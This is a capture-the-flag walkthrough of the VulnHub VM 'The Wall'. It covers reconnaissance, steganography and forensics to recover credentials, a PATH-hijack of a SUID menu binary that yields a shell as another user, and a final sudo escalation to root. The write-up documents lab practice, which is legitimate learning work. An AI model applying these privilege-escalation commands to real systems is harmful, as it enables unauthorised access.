The Wall VulnHub Writeup

  1. Sydd
  2. Roger
  3. The Wall
  4. Nick Mason
  5. Richard Wright
  6. David Gilmour
  7. 50 Years of the Floyd
  8. Conclusion

Xerubus released a new VM recently, named 'The Wall', in tribute to 50 years of Pink Floyd. This is my writeup for it - let's get started!

First things first, an nmap scan. Nada.

I fire up WireShark, and filter on the targets IP address. I notice that every 10 seconds, the target attempts to connect back to us on port 1337. My guess is there's some sort of host discovery / connect back going on on the target.

After listening on port 1337 on my test machine, I wait a few seconds and get a connect back.

$ nc -v -l 0.0.0.0 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.57.104] port 1337 [tcp/*] accepted (family 2, sport 32762)

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'   

              The Wall by @xerubus
          -= Welcome to the Machine =-

If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice

We simply get kicked out after this message. Checking WireShark again, I note that a HTTP request was made. I got lucky here - I had attempted to visit the target while nmap was running, and it just so happens the browser attempted (every so often) to reconnect, after the first failed attempt.

After visiting port 80 - I get a heart warming image presented to me.

Dawwwh - look at their little faces. I find nothing of interest in the image.

I note from the HTTP response, the server is apparently running on OpenBSD.

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 539
Content-Type: text/html
Date: Fri, 27 Nov 2015 19:37:53 GMT
Last-Modified: Sat, 24 Oct 2015 15:20:23 GMT
Server: OpenBSD httpd

I check the source of the page.

<html>
<body bgcolor="#000000">
<center><img src="pink_floyd.jpg"</img></center>
</body>
</html>


<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall

Did you know? The Publius Enigma is a mystery surrounding the Division Bell album.  Publius promised an unspecified reward for solving the
riddle, and further claimed that there was an enigma hidden within the artwork.

737465673d3333313135373330646262623337306663626539373230666536333265633035-->

That last string looks like a hex value. After decoding, I get the following.

steg=33115730dbbb370fcbe9720fe632ec05

Another hex value. The key 'steg' stands out. The only other piece of evidence we have is the image so far. I'm guessing there's some information hidden in the image, and this is the key to the retrieval of this information.

The value above looks like an MD5 hash. After putting it into CrackStation, I get a single hit - the phrase 'divisionbell'. I use this as the passphrase when using steghide to extract information from the JPG.

$ steghide extract -p divisionbell -sf evidence-1.jpg
wrote extracted data to "pink_floyd_syd.txt".
$ cat pink_floyd_syd.txt
Hey Syd,

I hear you're full of dust and guitars?

If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0

Roger

Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd.  The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.

Awesome. So, we've now got a Base64 encoded string (which decodes to 'SydBarrett') and another MD5 hash (which gives a single hit of 'pinkfloydrocks'). The only place we can provide a login currently is on the web server, so I attempt to pass in the username of 'SydBarret' with the password of 'pinkfloydrocks' as a basic auth pair.

After prodding about, I see that all PHP files appear to return a 403 error. I attempted to provide the login as a basic auth pair, but didn't receive a challenge, so I'm guessing this error is due to file permissions, instead of a htpasswd rule.

Running out of options, I decide to run another nmap scan. It really doesn't feel like these credentials can be used on the web server.

$ nmap -p0-65535 -sT -T5 -A -v 192.168.57.104

Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-27 22:32 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:32
Completed NSE at 22:32, 0.00s elapsed
Initiating NSE at 22:32
Completed NSE at 22:32, 0.00s elapsed
Initiating ARP Ping Scan at 22:32
Scanning 192.168.57.104 [1 port]
Completed ARP Ping Scan at 22:32, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:32
Completed Parallel DNS resolution of 1 host. at 22:32, 13.00s elapsed
Initiating Connect Scan at 22:32
Scanning 192.168.57.104 [65536 ports]
Discovered open port 80/tcp on 192.168.57.104
Discovered open port 1965/tcp on 192.168.57.104
Completed Connect Scan at 22:33, 54.18s elapsed (65536 total ports)
Initiating Service scan at 22:33
Scanning 2 services on 192.168.57.104
Completed Service scan at 22:35, 96.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.57.104
NSE: Script scanning 192.168.57.104.
Initiating NSE at 22:35
Completed NSE at 22:35, 7.21s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for 192.168.57.104
Host is up (0.0017s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    OpenBSD httpd
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
1965/tcp open  ssh     OpenSSH 7.0 (protocol 2.0)
| ssh-hostkey:
|   2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA)
|_  256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.00%I=7%D=11/27%Time=5658DA4F%P=x86_64-unknown-linux-gnu%
SF:r(GetRequest,2D9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nCon
SF:tent-Length:\x20539\r\nContent-Type:\x20text/html\r\nDate:\x20Fri,\x202
SF:7\x20Nov\x202015\x2021:56:24\x20GMT\r\nLast-Modified:\x20Sat,\x2024\x20
SF:Oct\x202015\x2015:20:23\x20GMT\r\nServer:\x20OpenBSD\x20httpd\r\n\r\n<h
SF:tml>\n<body\x20bgcolor=\"#000000\">\n<center><img\x20src=\"pink_floyd\.
SF:jpg\"</img></center>\n</body>\n</html>\n\n\n<!--If\x20you\x20want\x20to
SF:\x20find\x20out\x20what's\x20behind\x20these\x20cold\x20eyes,\x20you'll
SF:\x20just\x20have\x20to\x20claw\x20your\x20way\x20through\x20this\x20dis
SF:guise\.\x20-\x20Pink\x20Floyd,\x20The\x20Wall\n\nDid\x20you\x20know\?\x
SF:20The\x20Publius\x20Enigma\x20is\x20a\x20mystery\x20surrounding\x20the\
SF:x20Division\x20Bell\x20album\.\x20\x20Publius\x20promised\x20an\x20unsp
SF:ecified\x20reward\x20for\x20solving\x20the\x20\nriddle,\x20and\x20furth
SF:er\x20claimed\x20that\x20there\x20was\x20an\x20enigma\x20hidden\x20with
SF:in\x20the\x20artwork\.\n\n737465673d33333131353733306462626233373066636
SF:26539373230666536333265633035-->\n\n")%r(HTTPOptions,218,"HTTP/1\.0\x20
SF:405\x20Method\x20Not\x20Allowed\r\nDate:\x20Fri,\x2027\x20Nov\x202015\x
SF:2021:56:24\x20GMT\r\nServer:\x20OpenBSD\x20httpd\r\nConnection:\x20clos
SF:e\r\nContent-Type:\x20text/html\r\nContent-Length:\x20376\r\n\r\n<!DOCT
SF:YPE\x20html>\n<html>\n<head>\n<title>405\x20Method\x20Not\x20Allowed</t
SF:itle>\n<style\x20type=\"text/css\"><!--\nbody\x20{\x20background-color:
SF:\x20white;\x20color:\x20black;\x20font-family:\x20'Comic\x20Sans\x20MS'
SF:,\x20'Chalkboard\x20SE',\x20'Comic\x20Neue',\x20sans-serif;\x20}\nhr\x2
SF:0{\x20border:\x200;\x20border-bottom:\x201px\x20dashed;\x20}\n\n--></st
SF:yle>\n</head>\n<body>\n<h1>405\x20Method\x20Not\x20Allowed</h1>\n<hr>\n
SF:<address>OpenBSD\x20httpd</address>\n</body>\n</html>\n")%r(RTSPRequest
SF:,218,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDate:\x20Fri,\x20
SF:27\x20Nov\x202015\x2021:56:24\x20GMT\r\nServer:\x20OpenBSD\x20httpd\r\n
SF:Connection:\x20close\r\nContent-Type:\x20text/html\r\nContent-Length:\x
SF:20376\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n<title>405\x20Method\x
SF:20Not\x20Allowed</title>\n<style\x20type=\"text/css\"><!--\nbody\x20{\x
SF:20background-color:\x20white;\x20color:\x20black;\x20font-family:\x20'C
SF:omic\x20Sans\x20MS',\x20'Chalkboard\x20SE',\x20'Comic\x20Neue',\x20sans
SF:-serif;\x20}\nhr\x20{\x20border:\x200;\x20border-bottom:\x201px\x20dash
SF:ed;\x20}\n\n--></style>\n</head>\n<body>\n<h1>405\x20Method\x20Not\x20A
SF:llowed</h1>\n<hr>\n<address>OpenBSD\x20httpd</address>\n</body>\n</html
SF:>\n");
MAC Address: 08:00:27:F2:2B:B7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 5.X
OS CPE: cpe:/o:openbsd:openbsd:5
OS details: OpenBSD 5.0 - 5.4
Uptime guess: 0.000 days (since Fri Nov 27 22:35:22 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE
HOP RTT     ADDRESS
1   1.72 ms 192.168.57.104

NSE: Script Post-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.42 seconds
           Raw packets sent: 47 (4.644KB) | Rcvd: 11 (612B)

What's that - port 1965 is open, and it's an SSH server? Jack pot.

$ ssh -p 1965 SydBarrett@192.168.57.104
SydBarrett@192.168.57.104's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.57.104 closed.

Crap..

Sydd

So we've got a valid login for the system, but it only supports SFTP access. Let's have a sniff around.

$ sftp -P 1965 SydBarrett@192.168.57.104
SydBarrett@192.168.57.104's password:
Connected to 192.168.57.104.
sftp> ls -alh
drwxr-x---    0 0        1000         512B Oct 24 21:16 .
drwxr-x---    0 0        1000         512B Oct 24 21:16 ..
drwxr-xr-x    0 0        1000         512B Oct 24 19:17 .mail
-rw-r--r--    0 0        1000         1.9K Oct 25 22:56 bio.txt
-rw-r--r--    0 0        1000         849K Oct 24 17:17 syd_barrett_profile_pic.jpg
sftp> ls -alh .mail
drwxr-xr-x    0 0        1000         512B Oct 24 19:17 .mail/.
drwxr-x---    0 0        1000         512B Oct 24 21:16 .mail/..
drwxr-xr-x    0 0        1000         512B Nov 11 10:25 .mail/.stash
-rw-r--r--    0 0        1000         309B Oct 24 19:18 .mail/sent-items
sftp> ls -alh .mail/.stash
drwxr-xr-x    0 0        1000         512B Nov 11 10:25 .mail/.stash/.
drwxr-xr-x    0 0        1000         512B Oct 24 19:17 .mail/.stash/..
-rw-r--r--    0 0        1000        46.6M Aug  7 15:33 .mail/.stash/eclipsed_by_the_moon
sftp> ls -alh .mail/sent-items
-rw-r--r--    0 0        1000         309B Oct 24 19:18 .mail/sent-items

There a few files we can check out here. I download them all and get to work.

bio.txt unsurprisingly has a biography of Syd Barrett, and the JPG is a picture of the good man himself.

The file eclipsed_by_the_moon however, is an archive.

$ file eclipsed_by_the_moon
eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 00:15:47 2015, from Unix

Within this gzip is a tar..a tar.gz one might say.

$ tar zxvf eclipsed_by_the_moon.tar.gz
eclipsed_by_the_moon.lsd
$ file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector

So we've got a file system here. I use foremost to extract anything of interest.

$ foremost -v eclipsed_by_the_moon.lsd
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Fri Nov 27 22:53:46 2015
Invocation: foremost -v eclipsed_by_the_moon.lsd
Output directory: /home/test/Downloads/wall/eclipsed_by_the_moon.exc/output
Configuration file: /etc/foremost.conf
Processing: eclipsed_by_the_moon.lsd
|------------------------------------------------------------------
File: eclipsed_by_the_moon.lsd
Start: Fri Nov 27 22:53:46 2015
Length: 47 MB (49283072 bytes)

Num     Name (bs=512)           Size     File Offset     Comment

0:    00000418.jpg          123 KB          214016      
*|
Finish: Fri Nov 27 22:53:47 2015

1 FILES EXTRACTED

jpg:= 1
------------------------------------------------------------------

Foremost finished at Fri Nov 27 22:53:47 2015

We've got a single file that foremost managed to extract - an image.

It's Roger! And there's our password - hello_is_there_anybody_in_there.

$ ssh -p1965 RogerWaters@192.168.57.104
RogerWaters@192.168.57.104's password:
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'   
$

Roger

What does Mr Waters keep in his home directory, I wonder..

$ ls -alh
total 176
drwx------  3 RogerWaters  RogerWaters   512B Oct 28 09:29 .
drwxr-xr-x  7 root         wheel         512B Oct 24 17:36 ..
-rw-r--r--  1 RogerWaters  RogerWaters    87B Oct 24 17:35 .Xdefaults
-rw-r--r--  1 RogerWaters  RogerWaters   773B Oct 24 17:35 .cshrc
-rw-r--r--  1 RogerWaters  RogerWaters   103B Oct 24 17:35 .cvsrc
-rw-r--r--  1 RogerWaters  RogerWaters   398B Oct 26 04:01 .login
-rw-r--r--  1 RogerWaters  RogerWaters   175B Oct 24 17:35 .mailrc
-rw-r--r--  1 RogerWaters  RogerWaters   218B Oct 24 17:35 .profile
drwx------  2 RogerWaters  RogerWaters   512B Oct 26 03:56 .ssh
-rw-r--r--  1 RogerWaters  RogerWaters   2.8K Oct 26 08:57 bio.txt
-rw-r--r--  1 RogerWaters  RogerWaters     0B Oct 28 05:02 mbox
-rw-r--r--  1 RogerWaters  RogerWaters  47.0K Oct 26 06:16 roger_waters_profile_pic.jpg
-rw-r--r--  1 RogerWaters  RogerWaters  16.2K Oct 26 06:23 secret-diary

After some time of digging through Rogers personal items, I checked out the other users on the system - no surprises here.

$ ls -lah /home
total 28
drwxr-xr-x   7 root           wheel           512B Oct 24 17:36 .
drwxr-xr-x  13 root           wheel           512B Oct 24 18:03 ..
drwx------   4 DavidGilmour   DavidGilmour    512B Oct 28 09:28 DavidGilmour
drwx------   3 NickMason      NickMason       512B Aug  8 00:33 NickMason
drwx------   3 RichardWright  RichardWright   512B Nov 27 02:02 RichardWright
drwx------   3 RogerWaters    RogerWaters     512B Oct 28 09:29 RogerWaters
drwxr-xr-x   4 root           SydBarrett      512B Oct 24 18:03 SydBarrett

What was a nice surprise was that two of these users have binaries owned by them, with the SUID bit set.

$ find / -user NickMason 2>/dev/null     
/home/NickMason
/usr/local/bin/brick
$ ls -lah /usr/local/bin/brick
-rws--s--x  1 NickMason  NickMason   7.1K Aug  8 00:33 /usr/local/bin/brick
$ find / -user DavidGilmour 2>/dev/null
/home/DavidGilmour
/usr/local/bin/shineon
$ ls -lah /usr/local/bin/shineon
-rwsr-s---  1 DavidGilmour  RichardWright   7.3K Oct 25 07:58 /usr/local/bin/shineon

Looks like we've got our next step. Seeing as we're only able to execute one of these binaries, let's move on.

The Wall

I go ahead and execute /usr/local/bin/brick

$ /usr/local/bin/brick




What have we here, laddie?
Mysterious scribbings?
A secret code?
Oh, poems, no less!
Poems everybody!




Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ whoami
NickMason

Well, that was unexpected, but welcome. We're now one with Nick.

Nick Mason

After logging in, I have a bit of a dig about.

$ ls -alh /home/NickMason/                                                                                                                                    
total 1576
drwx------  3 NickMason  NickMason   512B Aug  8 00:33 .
drwxr-xr-x  7 root       wheel       512B Oct 24 17:36 ..
-rw-r--r--  1 NickMason  NickMason    87B Oct 24 17:34 .Xdefaults
-rw-r--r--  1 NickMason  NickMason   773B Oct 24 17:34 .cshrc
-rw-r--r--  1 NickMason  NickMason   103B Oct 24 17:34 .cvsrc
-rw-r--r--  1 NickMason  NickMason   398B Oct 24 17:34 .login
-rw-r--r--  1 NickMason  NickMason   175B Oct 24 17:34 .mailrc
-rw-r--r--  1 NickMason  NickMason   218B Oct 24 17:34 .profile
drwx------  2 NickMason  NickMason   512B Oct 28 04:48 .ssh
-rw-r--r--  1 NickMason  NickMason   1.3K Oct 26 08:58 bio.txt
-rw-r--r--  1 NickMason  NickMason     0B Oct 28 05:02 mbox
-rw-r--r--  1 NickMason  NickMason   749K Aug  8 00:33 nick_mason_profile_pic.jpg
$ cat bio.txt
"Nicholas Berkeley "Nick" Mason (born 27 January 1944) is an English musician and composer, best known as the drummer of Pink Floyd. He is the only constant member of the band since its formation in 1965. Despite solely writing only a few Pink Floyd songs, Mason has co-written some of Pink Floyd's most popular compositions such as "Echoes" and "Time".

Mason is the only Pink Floyd member to be featured on every one of their albums. It is estimated that as of 2010, the group have sold over 250 million records worldwide,[1][2] including 75 million units sold in the United States.

He competes in auto racing events, such as the 24 Hours of Le Mans.

On 26 November 2012, Mason received an Honorary Doctor of Letters from the University of Westminster at the presentation ceremony of the School of Architecture and Built Environment (he had studied architecture at the University's predecessor, Regent Street Polytechnic, 1962-1967)."

I wander if anyone is reading these bio's?  Richard Wright.. if you're reading this, I'm not really going to cut you into little pieces.  I was just having a joke.  Anyhow, I have now added you to thewall.  You're username is obvious. You'll find your password in my profile pic.

Source: Wikipedia (https://en.wikipedia.org/wiki/Nick_Mason)

Read that bio carefully..yeah..

I copy out the bio image, and try to open it up..turns out it is not a profile pic.

$ file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I

evidence-4.ogg

After listening to the playback, I can hear some morse code in the background.

.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-

This translates to..

RICHARDWRIGHT1943FARFISA

After a number of attempts, I hit on the right password for the user - 1943farfisa. Annoyingly, you cannot SSH in with the RichardWright user - you can only SU to it from another user on the system.

Richard Wright

Before we check out the binary we found previously, I have a sniff around Richards home directory.

$ ls -alh
total 84
drwx------  3 RichardWright  RichardWright   512B Nov 27 02:02 .
drwxr-xr-x  7 root           wheel           512B Oct 24 17:36 ..
-rw-r--r--  1 RichardWright  RichardWright    87B Oct 24 17:35 .Xdefaults
-rw-r--r--  1 RichardWright  RichardWright   773B Oct 24 17:35 .cshrc
-rw-r--r--  1 RichardWright  RichardWright   103B Oct 24 17:35 .cvsrc
-rw-r--r--  1 RichardWright  RichardWright   398B Oct 24 17:35 .login
-rw-r--r--  1 RichardWright  RichardWright   175B Oct 24 17:35 .mailrc
-rw-r--r--  1 RichardWright  RichardWright   218B Oct 24 17:35 .profile
drwx------  2 RichardWright  RichardWright   512B Oct 28 09:29 .ssh
-rw-r--r--  1 RichardWright  RichardWright   2.2K Oct 26 09:00 bio.txt
-rw-r--r--  1 RichardWright  RichardWright   990B Oct 27 01:46 mbox
-rw-r--r--  1 RichardWright  RichardWright  17.8K Oct 27 01:52 richard_wright_profile_pic.jpg

The bio contains standard stuff, and the profile picture..well, it's a profile picture.

It appears that Richard has mail.

$ cat mbox
From DavidGilmour@thewall.localdomain Tue Oct 27 01:41:18 2015
Return-Path: DavidGilmour@thewall.localdomain
Delivered-To: RichardWright@thewall.localdomain
Received: from localhost (thewall.localdomain [local])
        by thewall.localdomain (OpenSMTPD) with ESMTPA id 3ad74b19
        for <RichardWright@thewall.localdomain>;
        Tue, 27 Oct 2015 01:41:18 +1000 (AEST)
From: David Gilmour <DavidGilmour@thewall.localdomain>
Date: Tue, 27 Oct 2015 02:41:18 +1000 (AEST)
Message-Id: <9059884549097248741.enqueue@thewall.localdomain>
To: RichardWright@thewall.localdomain
Subject: Re: Brain Damage
Status: RO

G'day Rick.. how's the ivory tickling going?

There's plenty of bricks in the wall, so I'll give you a few when we catch up.

For now, just use that command I gave you with the menu.

Dave

----------

Hey Dave,
I feel like we're back in the studio for The Dark Side of the Moon.
Sorry to keep bugging you, but can you tell me again how to do things
when I'm on thewall.
Rick

This email references a command - I'm guessing that's the binary we found eariler. Let's check it out.

$ /usr/local/bin/shineon                                                                                                                                      
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit

After calling strings on the binary, I can see one path that is not correctly limited to a static path - mail. A rather crude way of finding the vulnerability, but effective.

$ strings /usr/local/bin/shineon
/usr/libexec/ld.so
OpenBSD
OpenBSD
libc.so.80.1
printf
__stack_smash_handler
__srget
getc
puts
system
_thread_atfork
environ
__progname
__cxa_atexit
__sF
__isthreaded
scanf
_Jv_RegisterClasses
__got_start
__got_end
__data_start
_edata
__bss_start
__progname_storage
__fini
__init_tcb
QRP1
[^_]
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail

Creating a symbolic link in the /tmp directory, then overriding the PATH, I can get a shell as David Gilmour.

$ ln -s /bin/sh /tmp/mail           
$ export PATH=/tmp:$PATH
$ /usr/local/bin/shineon                                                                                                                         
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ cd
mail: cd: /home/RichardWright - Permission denied
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)

On to the man of the hour.

David Gilmour

Once again, I check out his home directory.

$ cd /home/DavidGilmour/                                                                                                                                      
$ ls -lah
total 408
drwx------  4 DavidGilmour  DavidGilmour   512B Oct 28 09:28 .
drwxr-xr-x  7 root          wheel          512B Oct 24 17:36 ..
-rw-r--r--  1 DavidGilmour  DavidGilmour    87B Oct 24 17:36 .Xdefaults
-rw-r--r--  1 DavidGilmour  DavidGilmour   773B Oct 24 17:36 .cshrc
-rw-r--r--  1 DavidGilmour  DavidGilmour   103B Oct 24 17:36 .cvsrc
-rw-r--r--  1 DavidGilmour  DavidGilmour   398B Oct 24 17:36 .login
-rw-r--r--  1 DavidGilmour  DavidGilmour   175B Oct 24 17:36 .mailrc
drwx------  2 DavidGilmour  DavidGilmour   512B Oct 26 11:44 .private
-rw-r--r--  1 DavidGilmour  DavidGilmour   218B Oct 24 17:36 .profile
drwx------  2 DavidGilmour  DavidGilmour   512B Oct 28 05:16 .ssh
-rw-------  1 DavidGilmour  DavidGilmour   384B Aug  8 00:33 anotherbrick.txt
-rw-r--r--  1 DavidGilmour  DavidGilmour  1022B Oct 26 08:59 bio.txt
-rwxr-----  1 DavidGilmour  DavidGilmour   178K Oct 28 08:50 david_gilmour_profile_pic.jpg
-rw-r--r--  1 DavidGilmour  DavidGilmour   785B Oct 27 01:43 mbox

There's nothing of real interest here, apart from the file anotherbrick.txt.

$ cat anotherbrick.txt                                                                                                                                        
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond

New website for review:    pinkfloyd1965newblogsite50yearscelebration-temp/index.php

# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs

Upon reflection, we could of bypassed these steps entirely by reading this path from /etc/httpd.conf.org, but that wouldn't of been any fun now, would it?

As a matter of procedure, I check the profile image for strings.

who_are_you_and_who_am_i

This looks like a password to me. I try to use it to login as DavidGilmour.

$ login
login: DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)

Let's move on to this URL.

50 Years of the Floyd

Upon visiting the URL, we're presented with a lovely page, dedicated to 50 Years of Pink Floyd.

The menu items here link to index.php, with a parameter of 'page'.

<li><a href="?page=home">Home</a></li>
<li><a href="?page=about">About</a></li>
<li><a href="?page=albums">Albums</a></li>
<li><a href="?page=contact">Contact</a></li>

My first guess is a LFI vulnerability. After numerous attempts, I move away from the web application, as I can't seem to get anything of use out of it.

I start exploring the filesystem, including the web root. From this, we find a previously unknown directory named 'welcometothemachine'.

$ ls -alh /var/www/htdocs/welcometothemachine
total 24
drwxr-xr-x  2 root  welcometothemachine   512B Aug  8 00:33 .
drwxr-x---  4 www   welcometothemachine   512B Nov 27 01:47 ..
-rws--s---  1 root  welcometothemachine   7.3K Nov 27 01:47 PinkFloyd

Ok - all that we can do is run this binary.

$ /var/www/htdocs/welcometothemachine/PinkFloyd
/var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: test

Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh

Either we need to exploit this, or we need to guess the password.

After performing some enumeration, it appears to bug out after receiving more than 50 characters as input.

Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
Abort trap

Unfortunately, the option that prevents core dumps on SUID binaries is enabled.

$ sysctl kern.nosuidcoredump   
kern.nosuidcoredump=1

I was stuck on this stage for quite some time. After going back over my notes, and checking all the evidence, I noticed that I hadn't actually taken a look at the image from the last web page.

Now, I found nothing of interest in the exif data, but I noticed an abnormality at the bottom of the image. After modifying the levels slightly in GIMP, we see the following.

My first thought that this was an MD5 hash, but it is actually a HEX representation of a string.

50696e6b466c6f796435305965617273 = PinkFloyd50Years

I try using this as the password for the above binary, but receive the 'Access Denied' message again. I proceed to try the hex string itself, and am met by a different message!

$ /var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273

Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless

Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!

Unsure as to what this actually did, I look for any files that have been modified within the past 10 minutes.

$ find / -mmin -10 2>/dev/null
/home/RogerWaters
/dev/bpf0
/dev/ttyp0
/dev/ptyp0
/dev/null
/etc/sudoers
/var/cron/log
/var/db/dhclient.leases.pcn0
/var/log/daemon
/var/log/messages

So, the sudoers file has been updated. I re-check our sudo permissions.

$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User DavidGilmour may run the following commands on thewall:
    (ALL) SETENV: ALL

Boo-ya! We can use sudo to execute any command, as any user. Time to get our flag.

$ sudo su
# cd /root
# ls -lah
total 48
drwx------   5 root  wheel   512B Nov 27 02:04 .
drwxr-xr-x  14 root  wheel   512B Oct 24 18:03 ..
-rw-r--r--   1 root  wheel    87B Aug 16 18:25 .Xdefaults
-rw-r--r--   1 root  wheel   578B Aug 16 18:25 .cshrc
-rw-r--r--   1 root  wheel    94B Aug 16 18:25 .cvsrc
-rw-r--r--   1 root  wheel   328B Aug 16 18:25 .login
-rw-r--r--   1 root  wheel   468B Aug 16 18:25 .profile
drwx------   2 root  wheel   512B Nov 27 05:01 .ssh
-rw-r--r--   1 root  wheel   2.7K Nov 27 01:07 flag.txt
drwxr-xr-x   2 root  wheel   512B Nov 14 02:43 scripts
drwxr-xr-x   2 root  wheel   512B Oct 27 03:10 tmp
# cat flag.txt

"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar"

                   Congratulations on rooting thewall!

   ___________________________________________________________________
  | |       |       |       |       |       |       |       |       | |
  |_|_______|_______|______ '__  ___|_______|_______|_______|_______|_|
  |     |       |       |   |  )      /         |       |       |     |
  |_____|_______|_______|__ |,' , .  | | _ , ___|_______|_______|_____|
  | |       |       |      ,|   | |\ | | ,' |       |       |       | |
  |_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_|
  |     |       |       |   \  _' '  ` |  \     |       |       |     |
  |_____|_______|_______|_  ,-'_ _____ | _______|_______|_______|_____|
  | |       |       |   ,-'|  _     |       |       |       |       | |
  |_|_______|_______|__  ,-|-' |  ,-. \ /_.--. _____|_______|_______|_|
  |     |       |          |   |  | |  V  |   ) |       |       |     |
  |_____|_______|_______|_ | _ |-'`-'  |  | ,' _|_______|_______|_____|
  | |       |       |      |        |  '  ;'        |       |       | |
  |_|_______|_______|______"|_____  _,- o'__|_______|_______|_______|_|
  |     |       |       |       _,-'    .       |       |       |     |
